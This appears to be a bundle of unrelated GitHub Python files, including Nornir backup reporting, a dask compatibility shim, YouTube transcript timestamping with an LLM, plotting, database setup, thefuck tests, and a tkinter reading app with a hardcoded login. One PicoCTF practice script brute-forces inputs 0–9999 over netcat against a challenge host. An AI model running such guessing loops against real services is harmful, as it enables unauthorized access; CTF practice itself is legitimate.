\" + blocked[i] + \"\" + timedOut[i] + \"\" + badAuth[i] + \" \" + timedOut[i] + \"\" + badAuth[i] + \"\" + timedOut[i] + \"  \" + badAuth[i] + \"\" + badAuth[i] + \" 
\r\n

Backup Directory Git Commit Status

\r\n

Routers

\r\n \"\"\"\r\n html += \"

\" + str(commits['Routers']) + \"

\"\r\n html += \"

Switches

\"\r\n html += \"

\" + str(commits['Switches']) + \"

\"\r\n html += \"

Firewalls

\"\r\n html += \"

\" + str(commits['Firewalls']) + \"

\"\r\n html += \"

Voice

\"\r\n html += \"

\" + str(commits['Voice']) + \"

\"\r\n html += \"

WLCs

\"\r\n html += \"

\" + str(commits['WLCs']) + \"

\"\r\n\r\n with open(\"backupResults.html\", \"w\") as backupResults:\r\n backupResults.write(html)","repo_name":"bradley-rose/Nornir-DeviceBackup","sub_path":"Functions/deviceBackupLog.py","file_name":"deviceBackupLog.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120162855","text":"from distutils.version import LooseVersion\n\nimport dask.array as da\nimport numpy as np\nfrom dask import __version__ as dask_version\n\ntry:\n from dask.array import isin\nexcept ImportError: # pragma: no cover\n # Copied from dask v0.17.3.\n # Used under the terms of Dask's license, see licenses/DASK_LICENSE.\n\n def _isin_kernel(element, test_elements, assume_unique=False):\n values = np.in1d(element.ravel(), test_elements,\n assume_unique=assume_unique)\n return values.reshape(element.shape + (1,) * test_elements.ndim)\n\n def isin(element, test_elements, assume_unique=False, invert=False):\n element = da.asarray(element)\n test_elements = da.asarray(test_elements)\n element_axes = tuple(range(element.ndim))\n test_axes = tuple(i + element.ndim for i in range(test_elements.ndim))\n mapped = da.atop(_isin_kernel, element_axes + test_axes,\n element, element_axes,\n test_elements, test_axes,\n adjust_chunks={axis: lambda _: 1\n for axis in test_axes},\n dtype=bool,\n assume_unique=assume_unique)\n result = mapped.any(axis=test_axes)\n if invert:\n result = ~result\n return result\n\n\nif LooseVersion(dask_version) > LooseVersion('0.19.2'):\n gradient = da.gradient\n\nelse: # pragma: no cover\n # Copied from dask v0.19.2\n # Used under the terms of Dask's license, see licenses/DASK_LICENSE.\n import math\n from numbers import Integral, Real\n\n try:\n AxisError = np.AxisError\n except AttributeError:\n try:\n np.array([0]).sum(axis=5)\n except Exception as e:\n AxisError = type(e)\n\n def validate_axis(axis, ndim):\n \"\"\" Validate an input to axis= keywords \"\"\"\n if isinstance(axis, (tuple, list)):\n return tuple(validate_axis(ax, ndim) for ax in axis)\n if not isinstance(axis, Integral):\n raise TypeError(\"Axis value must be an integer, got %s\" % axis)\n if axis < -ndim or axis >= ndim:\n raise AxisError(\"Axis %d is out of bounds for array of dimension \"\n \"%d\" % (axis, ndim))\n if axis < 0:\n axis += ndim\n return axis\n\n def _gradient_kernel(x, block_id, coord, axis, array_locs, grad_kwargs):\n \"\"\"\n x: nd-array\n array of one block\n coord: 1d-array or scalar\n coordinate along which the gradient is computed.\n axis: int\n axis along which the gradient is computed\n array_locs:\n actual location along axis. 
None if coordinate is scalar\n grad_kwargs:\n keyword to be passed to np.gradient\n \"\"\"\n block_loc = block_id[axis]\n if array_locs is not None:\n coord = coord[array_locs[0][block_loc]:array_locs[1][block_loc]]\n grad = np.gradient(x, coord, axis=axis, **grad_kwargs)\n return grad\n\n def gradient(f, *varargs, **kwargs):\n f = da.asarray(f)\n\n kwargs[\"edge_order\"] = math.ceil(kwargs.get(\"edge_order\", 1))\n if kwargs[\"edge_order\"] > 2:\n raise ValueError(\"edge_order must be less than or equal to 2.\")\n\n drop_result_list = False\n axis = kwargs.pop(\"axis\", None)\n if axis is None:\n axis = tuple(range(f.ndim))\n elif isinstance(axis, Integral):\n drop_result_list = True\n axis = (axis,)\n\n axis = validate_axis(axis, f.ndim)\n\n if len(axis) != len(set(axis)):\n raise ValueError(\"duplicate axes not allowed\")\n\n axis = tuple(ax % f.ndim for ax in axis)\n\n if varargs == ():\n varargs = (1,)\n if len(varargs) == 1:\n varargs = len(axis) * varargs\n if len(varargs) != len(axis):\n raise TypeError(\n \"Spacing must either be a single scalar, or a scalar / \"\n \"1d-array per axis\"\n )\n\n if issubclass(f.dtype.type, (np.bool8, Integral)):\n f = f.astype(float)\n elif issubclass(f.dtype.type, Real) and f.dtype.itemsize < 4:\n f = f.astype(float)\n\n results = []\n for i, ax in enumerate(axis):\n for c in f.chunks[ax]:\n if np.min(c) < kwargs[\"edge_order\"] + 1:\n raise ValueError(\n 'Chunk size must be larger than edge_order + 1. '\n 'Minimum chunk for aixs {} is {}. Rechunk to '\n 'proceed.'.format(np.min(c), ax))\n\n if np.isscalar(varargs[i]):\n array_locs = None\n else:\n if isinstance(varargs[i], da.Array):\n raise NotImplementedError(\n 'dask array coordinated is not supported.')\n # coordinate position for each block taking overlap into\n # account\n chunk = np.array(f.chunks[ax])\n array_loc_stop = np.cumsum(chunk) + 1\n array_loc_start = array_loc_stop - chunk - 2\n array_loc_stop[-1] -= 1\n array_loc_start[0] = 0\n array_locs = (array_loc_start, array_loc_stop)\n\n results.append(f.map_overlap(\n _gradient_kernel,\n dtype=f.dtype,\n depth={j: 1 if j == ax else 0 for j in range(f.ndim)},\n boundary=\"none\",\n coord=varargs[i],\n axis=ax,\n array_locs=array_locs,\n grad_kwargs=kwargs,\n ))\n\n if drop_result_list:\n results = results[0]\n\n return results\n","repo_name":"timothyyu/ml_monorepo","sub_path":"xarray/xarray/core/dask_array_compat.py","file_name":"dask_array_compat.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"16847911469","text":"from dotenv import load_dotenv\nfrom typing import List\nimport numpy as np\nimport re\nfrom youtube_transcript_api import YouTubeTranscriptApi\n\nfrom langchain.output_parsers import PydanticOutputParser\nfrom langchain.prompts import PromptTemplate\nfrom langchain.pydantic_v1 import BaseModel, Field\n\nfrom llama_index.llms import OpenAI\n\nload_dotenv()\n\n\ndef convert_timestamps_to_intervals(timestamps):\n \"\"\"\n Convert a list of timestamps and descriptions into a list of intervals.\n\n Args:\n timestamps (list): A list of strings in the format \"HH:MM:SS description\".\n\n Returns:\n list: A list of dictionaries, where each dictionary represents an interval\n and has the keys \"start\", \"end\", and \"desc\". 
The \"start\" and \"end\" values\n are in seconds, and the \"desc\" value is a string describing the interval.\n \"\"\"\n\n def convert_to_seconds(timestamp):\n num_splits = len(timestamp.split(\":\"))\n if num_splits == 2:\n timestamp = re.search(r\"\\d{1,2}:\\d{2}\", timestamp).group(0)\n m, s = map(int, timestamp.split(\":\"))\n h = 0\n elif num_splits == 3:\n timestamp = re.search(r\"\\d{1,2}:\\d{2}:\\d{2}\", timestamp).group(0)\n h, m, s = map(int, timestamp.split(\":\"))\n else:\n try:\n h, m, s = map(int, timestamp.split(\":\")[-3:])\n except:\n timestamp = re.search(r\"\\d{2}:\\d{2}:\\d{2}\", timestamp).group(0)\n h, m, s = map(int, timestamp.split(\":\"))\n return h * 3600 + m * 60 + s\n\n def split_timestamps(description):\n # Find all timestamps in the description\n timestamps = re.findall(r\"\\d{2}:\\d{2}:\\d{2}\", description)\n\n # Split the description at each timestamp\n parts = re.split(r\"\\d{2}:\\d{2}:\\d{2}\", description)\n parts = [part.strip() for part in parts if part.strip()]\n\n return list(zip(timestamps, parts))\n\n intervals = []\n for i, entry in enumerate(timestamps):\n parts = entry.split(\" \", 1)\n initial_timestamp = parts[0]\n description = parts[1]\n\n # Handle multiple timestamps within a single description\n if len(re.findall(r\"\\d{2}:\\d{2}:\\d{2}\", description)) > 0:\n split_entries = split_timestamps(description)\n for j, (ts, desc) in enumerate(split_entries):\n start_seconds = convert_to_seconds(ts)\n end_seconds = (\n convert_to_seconds(timestamps[i + 1].split(\" \")[0])\n if i + 1 < len(timestamps)\n else None\n )\n intervals.append(\n {\n \"start\": float(start_seconds),\n \"end\": float(end_seconds) if end_seconds else \"end\",\n \"desc\": desc,\n }\n )\n else:\n start_seconds = convert_to_seconds(initial_timestamp)\n end_seconds = (\n convert_to_seconds(timestamps[i + 1].split(\" \")[0])\n if i + 1 < len(timestamps)\n else None\n )\n intervals.append(\n {\n \"start\": float(start_seconds),\n \"end\": float(end_seconds) if end_seconds else \"end\",\n \"desc\": description.strip(),\n }\n )\n\n intervals = [interval for interval in intervals if interval[\"end\"] != \"end\"]\n intervals = [\n interval for interval in intervals if \"sponsor\" not in interval[\"desc\"].lower()\n ]\n\n return intervals\n\n\ndef convert_transcript_to_dict(url):\n \"\"\"\n Convert YouTube video transcript to a dictionary.\n\n Args:\n url (str): The URL of the YouTube video.\n\n Returns:\n dict: A dictionary where the keys are the timestamps of each transcript\n entry and the values are the corresponding transcript text.\n \"\"\"\n match = re.search(r\"v=([^&]+)\", url)\n video_id = match.group(1) if match else url.split(\"/\")[-1]\n # video_id = url.split(\"/\")[-1]\n data = YouTubeTranscriptApi.get_transcript(video_id, languages=[\"en-US\", \"en\"])\n\n result = {}\n for entry in data:\n if \"text\" in entry:\n result[entry[\"start\"]] = entry[\"text\"]\n return result\n\n\ndef extract_transcript_from_timeframe(data_dict, start, end):\n \"\"\"\n Extracts the transcript of a given timeframe from a dictionary of YouTube video transcripts.\n\n Args:\n data_dict (dict): A dictionary containing the YouTube video transcript data.\n start (float): The start time of the desired transcript in seconds.\n end (float): The end time of the desired transcript in seconds.\n\n Returns:\n str: The transcript of the given timeframe.\n \"\"\"\n\n def clean_test(text):\n text = text.replace(\"\\n\", \" \")\n text = re.sub(r\"\\s+\", \" \", text)\n text = text.replace(\" -\", \"-\")\n 
text = text.strip()\n return text\n\n keys = np.array(list(data_dict.keys()))\n closest_start = np.argmin(np.abs(keys - start))\n closest_end = np.argmin(np.abs(keys - end))\n timestamps = keys[closest_start : closest_end + 1]\n\n transcript = \"\"\n for t in timestamps:\n text = clean_test(data_dict[t])\n transcript += text + \" \"\n\n transcript = transcript.strip()\n\n return transcript\n\n\ndef generate_timestamps_from_yt_transcript(yt_transcript):\n \"\"\"\n Generate timestamps from a YouTube transcript.\n\n Args:\n yt_transcript (dict): The YouTube transcript.\n\n Returns:\n List[dict]: A list of dictionaries containing the start time, end time, description, and transcript for each timestamp.\n \"\"\"\n\n class Transcript(BaseModel):\n \"\"\"Data model for transcript.\"\"\"\n\n start: float = Field(description=\"Start time of the timestamp in seconds\")\n end: float = Field(description=\"End time of the timestamp in seconds\")\n desc: str = Field(description=\"Short description of the timestamp\")\n # transcript: str\n\n class Transcripts(BaseModel):\n \"\"\"Data model for transcripts.\"\"\"\n\n transcripts: List[Transcript]\n\n MODEL_NAME = \"gpt-4-1106-preview\"\n TEMPERATURE = 0.1\n GENERATION_RETRIES = 3\n PROMPT_TEMPLATE_STR = \"\"\"\\\n Given the Youtube Transcript below, read it till the very end, pick up the main points and create timestamps.\n All transcript time should be covered.\n Each timestamp should be more than 30 seconds long.\n\n Youtube Transcript:\n {yt_transcript}\n\n {format_instructions}\n \"\"\"\n\n model = OpenAI(model=MODEL_NAME, temperature=TEMPERATURE)\n\n parser = PydanticOutputParser(pydantic_object=Transcripts)\n\n prompt = PromptTemplate(\n template=PROMPT_TEMPLATE_STR,\n input_variables=[\"yt_transcript\"],\n partial_variables={\"format_instructions\": parser.get_format_instructions()},\n )\n\n _input = prompt.format_prompt(yt_transcript=str(yt_transcript))\n\n # Retry if there is an error\n for _ in range(GENERATION_RETRIES):\n try:\n output = model.complete(_input.to_string())\n output = output.text\n json_output = parser.parse(output)\n str_err = None\n except Exception as e:\n str_err = str(e)\n print(str_err)\n pass\n\n if not str_err:\n break\n\n transcripts = []\n\n for timestamp in json_output.transcripts:\n start = timestamp.start\n end = timestamp.end\n desc = timestamp.desc\n transcript = extract_transcript_from_timeframe(\n data_dict=yt_transcript, start=start, end=end\n )\n transcript = transcript.strip()\n interval = {\"start\": start, \"end\": end, \"desc\": desc, \"transcript\": transcript}\n transcripts.append(interval)\n\n return transcripts\n","repo_name":"leonseet/andrew_huberman_chatbot","sub_path":"libs/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":7796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29141300322","text":"import pickle\nimport json\nimport os, glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pdb\n\n# data_name = ['initial', 'half', 'one', 'two', 'sparse']\n# legend_name = {\n# \t'initial':\t'Initialization',\n# \t'half'\t: \t'0.5-norm',\n# \t'one'\t: \t'1-norm',\n# \t'two'\t: \t'2-norm',\n# \t'sparse':\t'AUSC',\n# }\n\ndata_name = ['one_new','one_accommodation']\nlegend_name = {\n\t'one_new'\t:\t'1-norm',\n\t'one_accommodation':\t'Accommodation'\n}\n\ndata = {}\nfile_dir = \"./test_results/pyConfLensFlowNetFast_ext/\"\nfor name in data_name:\n\twith open(file_dir+name+'.pickle','rb') as 
f:\n\t\tdata[name] = pickle.load(f)\n\n# fig = plt.figure()\t\n# # draw the sparsification curve\n# ax1 = fig.add_subplot(3,2,1, title=\"Sparsification Curve\")\n# legends = []\n# for name in data_name:\n# \t# get the data\n# \tZ_flat = data[name]['Z_flat'].flatten()\n# \tZ_gt_flat = data[name]['Z_gt_flat'].flatten()\n# \tconf_flat = data[name]['conf_flat'].flatten()\n\n# \t# data is too much, sample them\n# \tidx = ((np.random.rand(500000)*len(Z_flat)).astype(np.int),)\n# \tZ_flat = Z_flat[idx]\n# \tZ_gt_flat = Z_gt_flat[idx]\n# \tconf_flat = conf_flat[idx]\n\t\n# \terr = np.abs(Z_flat - Z_gt_flat).astype(np.float64)\n\n# \t# sort the conf_flat\n# \terr_sorted = err[np.argsort(conf_flat)]\n# \tsparse = np.arange(len(err))/len(err)\n# \tnum = len(err) - np.arange(len(err))\n\n# \tfor i in range(len(err)-1,0,-1):\n# \t\terr_sorted[i-1] += err_sorted[i]\n# \terr_sorted /= num\n\n# \t# draw a fig that shows the average error with a certain sparsication\n# \tbin_nums = 1000\n# \tstep = np.linspace(0, len(err_sorted)-1, bin_nums, True).astype(np.int)\n\t\n# \terr_show = err_sorted[step]\n# \tsparse_show = sparse[step]\n\n# \t# compute the AUC\n# \tarea = np.mean(err_sorted)\n\n# \t# draw the figure\t\n# \tline, = ax1.plot(sparse_show, err_show, '-', label=legend_name[name])\n# \tlegends.append(line)\n\n# plt.legend(handles=legends)\n# ax1.set_xlabel('Sparsification')\n# ax1.set_ylabel('Average error')\n# plt.ylim((0.0,0.14))\n\n\n# # draw the AUC vs. depth\n# i = 1\n# for name in data_name:\n# \ti += 1\n# \tax2 = fig.add_subplot(3,2,i, title=legend_name[name])\n# \t# get the data\n# \tZ_gt_flat = data[name]['Z_gt_flat'][0,:] + 1.38\n# \tAUC = data[name]['AUC']\n# \tax2.plot(Z_gt_flat, AUC, '.')\n# \tax2.set_xlabel('True depth (m)')\n# \tax2.set_ylabel('AUSC of each prediction')\n# \tplt.ylim((0,0.4))\n# \tplt.xlim((0.25,1.2))\n\n# draw average AUC vs. 
depth\ni = 1\nlegends = []\nfig = plt.figure()\nax3 = fig.add_subplot(1,1,i)\nfor name in data_name:\n\tZ_gt_flat = data[name]['Z_gt_flat'][0,:] + 1.38\n\tAUC = data[name]['AUC']\n\tZ_gt_flat_uni = np.unique(Z_gt_flat)\n\tAUC_mean = []\n\tfor Z_gt_elem in Z_gt_flat_uni:\n\t\tAUC_mean.append(\n\t\t\tnp.mean(\n\t\t\t\tAUC[np.where(Z_gt_flat==Z_gt_elem)]\n\t\t\t)\n\t\t)\n\tline, = ax3.plot(Z_gt_flat_uni, AUC_mean, '.', label=legend_name[name])\n\tlegends.append(line)\n\tax3.set_xlabel('True depth (m)')\n\tax3.set_ylabel('Average AUSC (m)')\n\tplt.ylim((0,0.3))\n\tplt.xlim((0.26,1.12))\n\n# plt.legend(handles=legends)\nax3.plot([0,10],[0.05,0.05],'k')\nplt.show()","repo_name":"guoqi1123/focaltrack","sub_path":"extra/testing_show.py","file_name":"testing_show.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"18959539950","text":"import asyncio\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.ext.asyncio import create_async_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nimport config\n\nDB_URL = f'postgresql+asyncpg://{config.DB_USER}:{config.DB_PASSWORD}@{config.DB_HOST}:{config.DB_PORT}/{config.DB_NAME}'\nasync_engine = create_async_engine(DB_URL, echo=True)\n\nBase = declarative_base()\nasync_session = sessionmaker(\n    async_engine, class_=AsyncSession, expire_on_commit=False\n)\n\n\n# Dependency\nasync def get_session() -> AsyncSession:\n    async with async_session() as session:\n        yield session\n\n\nasync def init_models():\n    async with async_engine.begin() as conn:\n        await conn.run_sync(Base.metadata.drop_all)\n        await conn.run_sync(Base.metadata.create_all)\n\n\nif __name__ == '__main__':\n    asyncio.run(init_models())\n","repo_name":"IvaRude/FastAPI-Example","sub_path":"src/db/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28758516014","text":"import subprocess\n\nip = \"0.cloud.chals.io\"\nport = 34293\nfor i in range(10000):\n    # run nc command\n    p = subprocess.Popen([\"nc\", ip, str(port)], stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n    # send i as input and read the response (the pipe expects bytes, and stdin must be closed before reading)\n    output, _ = p.communicate((str(i) + \"\\n\").encode())","repo_name":"Boomer-Sooner-PC/Competitive-Programming","sub_path":"Practice/PicoCTF/valentine.py","file_name":"valentine.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40626096613","text":"x = 10\ny = \"10\"\nz = 10.1\n\nsum1 = x + x\nsum2 = y + y\n\nprint (sum1, sum2)\n\nprint (type(x), type(y), type(z))\n# --------------------------------------\n\nx = dir(list) # List all the properties and methods\n\nfor i in x:\n    print (i)\n\n# use help(instruction) to get help in the REPL\n\n\n","repo_name":"hdavidlp/megacourse","sub_path":"section 1_3/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73035551413","text":"import pytest\nfrom tests.utils import Command\nfrom thefuck.rules.heroku_not_command import match, get_new_command\n\n\ndef suggest_stderr(cmd):\n    return ''' !    `{}` is not a heroku command.\n !    Perhaps you meant `logs`, `pg`.\n !    
See `heroku help` for a list of available commands.'''.format(cmd)\n\n\nno_suggest_stderr = ''' ! `aaaaa` is not a heroku command.\n ! See `heroku help` for a list of available commands.'''\n\n\n@pytest.mark.parametrize('cmd', ['log', 'pge'])\ndef test_match(cmd):\n assert match(\n Command('heroku {}'.format(cmd), stderr=suggest_stderr(cmd)))\n\n\n@pytest.mark.parametrize('script, stderr', [\n ('cat log', suggest_stderr('log')),\n ('heroku aaa', no_suggest_stderr)])\ndef test_not_match(script, stderr):\n assert not match(Command(script, stderr=stderr))\n\n\n@pytest.mark.parametrize('cmd, result', [\n ('log', ['heroku logs', 'heroku pg']),\n ('pge', ['heroku pg', 'heroku logs'])])\ndef test_get_new_command(cmd, result):\n command = Command('heroku {}'.format(cmd), stderr=suggest_stderr(cmd))\n assert get_new_command(command) == result\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/nvbn_thefuck/thefuck-master/tests/rules/test_heroku_not_command.py","file_name":"test_heroku_not_command.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"16247046166","text":"from logging import root\nimport tkinter as tk\nfrom tkinter import ttk, messagebox\nfrom tkinter.font import BOLD\nimport util.generic as utl\nfrom PIL import ImageTk, Image\nfrom tkinter import Image, Tk, Button, Entry, Label, ttk, PhotoImage\nfrom tkinter import Frame\nimport webbrowser\nfrom cProfile import label\nfrom os import stat\nfrom used.generic2 import leer_imagen\nfrom tkinter import *\nfrom tkinter import ttk\n\nclass Liot:\n \n def verificar(self):\n usu = self.usuario.get()\n password = self.password.get() \n if(usu == \"User\" and password == \"1234\") :\n self.ventana.destroy()\n AppLiot()\n else:\n messagebox.showerror(message=\"La contraseña o el usuario no son correctos\",title=\"Error\") \n \n def __init__(self): \n self.ventana = tk.Tk() \n self.ventana.title('Inicio de sesión')\n self.ventana.geometry('800x500')\n self.ventana.config(bg='#fcfcfc')\n self.ventana.resizable(width=0, height=0) \n utl.centrar_ventana(self.ventana,800,500)\n \n logo =utl.leer_imagen(\"./imagenes/logo.png\", (450, 450))\n # frame_logo\n frame_logo = tk.Frame(self.ventana, bd=0, width=300, relief=tk.SOLID, padx=10, pady=10,bg='white')\n frame_logo.pack(side=\"left\",expand=tk.YES,fill=tk.BOTH)\n label = tk.Label( frame_logo, image=logo,bg='white' )\n label.place(x=0,y=0,relwidth=1, relheight=1)\n \n #frame_form\n frame_form = tk.Frame(self.ventana, bd=0, relief=tk.SOLID, bg='#fcfcfc')\n frame_form.pack(side=\"right\",expand=tk.YES,fill=tk.BOTH)\n #frame_form\n \n #frame_form_top\n frame_form_top = tk.Frame(frame_form,height = 50, bd=0, relief=tk.SOLID,bg='white')\n frame_form_top.pack(side=\"top\",fill=tk.X)\n title = tk.Label(frame_form_top, text=\"Inicio de sesión\",font=('Open Sans Bold', 30), fg=\"#EB5066\",bg='#fcfcfc',pady=50)\n title.pack(expand=tk.YES,fill=tk.BOTH)\n #end frame_form_top\n\n #frame_form_fill\n frame_form_fill = tk.Frame(frame_form,height = 50, bd=0, relief=tk.SOLID,bg='#fcfcfc')\n frame_form_fill.pack(side=\"bottom\",expand=tk.YES,fill=tk.BOTH)\n\n etiqueta_usuario = tk.Label(frame_form_fill, text=\"Usuario\", font=('Open Sans', 14) ,fg=\"#666a88\",bg='#fcfcfc', anchor=\"w\")\n etiqueta_usuario.pack(fill=tk.X, padx=20,pady=5)\n self.usuario = ttk.Entry(frame_form_fill, font=('Open Sans', 14))\n self.usuario.pack(fill=tk.X, padx=20,pady=10)\n\n etiqueta_password = tk.Label(frame_form_fill, 
text=\"Contraseña\", font=('Open Sans', 14),fg=\"#666a88\",bg='#fcfcfc' , anchor=\"w\")\n etiqueta_password.pack(fill=tk.X, padx=20,pady=5)\n self.password = ttk.Entry(frame_form_fill, font=('Open Sans', 14))\n self.password.pack(fill=tk.X, padx=20,pady=10)\n self.password.config(show=\"*\")\n\n inicio = tk.Button(frame_form_fill,text=\"Iniciar sesión\",font=('Open Sans', 15,BOLD),bg='#EB5066', bd=0,fg=\"#fff\",command=self.verificar)\n inicio.pack(fill=tk.X, padx=20,pady=20) \n inicio.bind(\"\", (lambda event: self.verificar()))\n #end frame_form_fill\n self.ventana.mainloop()\n \nif __name__ == \"__main__\":\n Liot()\n\nclass AppLiot():\n \n class Ventana(Frame):\n def __init__(self, master, *args):\n super().__init__( master,*args)\n self.menu = True\n self.color = True\n\n self.frame_inicio = Frame(self.master, bg='white', width=50, height=50)\n self.frame_inicio.grid_propagate(0)\n self.frame_inicio.grid(column=0, row = 0, sticky='nsew')\n self.frame_menu = Frame(self.master, bg='white', width = 50)\n self.frame_menu.grid_propagate(0)\n self.frame_menu.grid(column=0, row = 1, sticky='nsew')\n self.frame_principal = Frame(self.master, bg='white')\n self.frame_principal.grid(column=1, row=1, sticky='nsew')\n self.master.columnconfigure(1, weight=1)\n self.master.rowconfigure(1, weight=1)\n self.frame_principal.columnconfigure(0, weight=1)\n self.frame_principal.rowconfigure(0, weight=1)\n self.widgets()\t\t\n\n def pantalla_inicial(self):\n self.paginas.select([self.frame_uno])\n #self.imagen_lectura = PhotoImage(file = 'letras.png')\n #Button(self.frame_uno, image= self.imagen_lectura, command= self.pantalla_inicial).place(x=70,y=325)\n\n def pantalla_reglas(self):\n self.paginas.select([self.frame_dos])\n self.frame_dos.columnconfigure(0, weight=1)\n self.frame_dos.columnconfigure(1, weight=1)\n self.frame_dos.rowconfigure(2, weight=1)\n Button(self.frame_dos ,image= self.ReglaB, command = self.reglaB ,bg='white').place(x=20,y= 10)\n Button(self.frame_dos ,image= self.ReglaC, command = self.reglaC, bg='white',).place(x=320,y= 10)\n Button(self.frame_dos ,image= self.ReglaH, command = self.reglaH, bg='white').place(x=620,y= 10)\n Button(self.frame_dos ,image= self.ReglaJ, command = self.reglaJ, bg='white').place(x=920,y= 10)\n Button(self.frame_dos ,image= self.ReglaS, command = self.reglaS, bg='white').place(x=20,y= 320)\n Button(self.frame_dos ,image= self.ReglaV, command = self.reglaV, bg='white').place(x=320,y= 320)\n Button(self.frame_dos ,image= self.ReglaY, bg='white',command= self.pantalla_reglaY).place(x=620,y= 320)\n Button(self.frame_dos ,image= self.Reglapunt, command = self.reglaPC, bg='white').place(x=920,y= 320)\n #Button(self.frame_dos ,image= self.Reglacoma, bg='white').place(x=660,y= 320)\n\n def reglaB(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFMEynvHyg/ZZ86wNv6te1w9Lquf-8L4g/view?utm_content=DAFMEynvHyg&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaC(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFMQBWYkMQ/GI0uwiQMhod8ch84rKCVvA/view?utm_content=DAFMQBWYkMQ&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaV(self):\n 
webbrowser.open_new(\"https://www.canva.com/design/DAFMP5tZC7A/dOZLEREy1DWvR-49KVgxZg/view?utm_content=DAFMP5tZC7A&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaPC(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSCMurjiM/eKUhOuIqG00sBgkGe3usxQ/view?utm_content=DAFSCMurjiM&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaH(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSB4A7GzE/zrwxk4yzCkSO3Rnmq9Pusw/view?utm_content=DAFSB4A7GzE&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n################################################## \n def reglaS(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFMQDCzLjE/8xgM-NWwn2W4JvGpO4mFrg/view?utm_content=DAFMQDCzLjE&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaY(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSB5wxs0I/93_7_g0_Si2w6VAFb8Lqyg/view?utm_content=DAFSB5wxs0I&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n################################################## \n def reglaJ(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSEWv_XaA/Hw3mCAYLpcWeLDrNp6yHng/view?utm_content=DAFSEWv_XaA&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\") \n##################################################\n \n def pantalla_Lecturas(self):\n self.paginas.select([self.frame_tres])\n self.frame_tres.columnconfigure(0, weight=1)\n self.frame_tres.columnconfigure(1, weight=1)\n Button(self.frame_tres ,image= self.caperucita, bg='white',command = self.pantalla_lectura).place(x=20,y= 10)\n Button(self.frame_tres ,image= self.lectura2, command = self.tree_pigs, bg='white').place(x=320,y= 10)\n Button(self.frame_tres ,image= self.lectura3, command = self.gatoconbotas, bg='white').place(x=620,y= 10)\n Button(self.frame_tres ,image= self.lectura4, command = self.perroylobo, bg='white').place(x=920,y= 10)\n Button(self.frame_tres ,image= self.lectura5, command = self.risitos, bg='white').place(x=20,y= 320)\n Button(self.frame_tres ,image= self.lectura6, command = self.la_vos, bg='white').place(x=320,y= 320)\n Button(self.frame_tres ,image= self.lectura7, command = self.perro_cazador, bg='white').place(x=620,y= 320)\n Button(self.frame_tres ,image= self.lectura8, command = self.burro_flauta, bg='white').place(x=920,y= 320)\n \n def risitos(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFOSG4fL3o/b4sR-0-8SCHX9-43xAjoJg/view?utm_content=DAFOSG4fL3o&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n \n def tree_pigs(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSE7Cyrms/_c1lYc2z6FsebFYiVV9fnw/view?utm_content=DAFSE7Cyrms&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n \n def gatoconbotas(self):\n webbrowser.open_new(\"https://www.guiainfantil.com/articulos/ocio/cuentos-infantiles/el-gato-con-botas-fabulas-para-ninos/\")\n \n def la_vos(self):\n webbrowser.open_new(\"https://gabrielxp123.wixsite.com/comprensionlectora/post/la-mejor-voz\")\n \n def perro_cazador(self):\n webbrowser.open_new(\"https://www.mundoprimaria.com/fabulas-para-ninos/el-viejo-perro-cazador\")\n \n def burro_flauta(self):\n webbrowser.open_new(\"https://www.mundoprimaria.com/fabulas-para-ninos/el-burro-y-la-flauta\")\n \n def 
